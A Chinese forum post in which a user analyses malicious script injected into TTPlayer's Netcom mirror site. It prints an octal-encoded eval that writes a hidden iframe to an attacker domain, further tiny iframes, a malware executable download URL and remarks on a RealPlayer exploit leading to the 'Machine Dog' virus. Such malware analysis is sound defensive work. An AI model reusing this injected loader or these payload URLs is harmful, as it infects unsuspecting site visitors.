现在貌似已经正常了～～

 

 

 

http://wwwct.ttplayer.com/index.php > 电信站

 

http://wwwcnc.ttplayer.com/index.php > 网通站

 

用HttpDebuger看了下，是网通站被挂了～电信滴正常。。

 

 

 

<SCRIPT>eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\134\57\134\57\141\141\56\154\154\163\147\151\156\147\56\143\157\155\134\57\167\167\134\57\156\145\167\62\70\60\56\150\164\155\77\60\61\66\40\167\151\144\164\150\75\61\40\150\145\151\147\150\164\75\61\76\74\134\57\151\146\162\141\155\145\76\42\51");</script><html>

 

 

 

<iframe src=hXXp://a5.llsging.com/aa/nini.htm width=6 height=6></iframe>

 

<iframe src=hXXp://a5.llsging.com/aa/gege.htm width=6 height=6></iframe>

 

 

16进制加密，解后有5个JS：

 

 

加密方式是unescape＋16进制。

 

下载这个：http://down.llsging.com/bb/014.exe

 

 

加密方式是2次unescape

 

源代码解不出来，只解出了地址：

 

 

 

eval(function(p,a,c,k,e,d)加密

 

解后是8进制加密，再有一个unescape，最后得：

 

 

 

 

 

2次unescape，最后得：

 

 

 

 

这个是RealPlayer漏洞～eval(function(p,a,c,k,e,d)＋8进制加密

 

全部都解出来了～就这个RealPlayer漏洞的下载地址解不出来～

 

呵呵，没有安装呢....无法激活漏洞

 

 

www.kingzoo.com/tools/孤独更可靠/Temporary file.rar

 

解得头都大了~~很乱。。没有整理~

 

随便一提，那些漏洞下载的地址不一样，但都是同一个病毒，是机器狗~

 

我就没看了，前几天才遇到：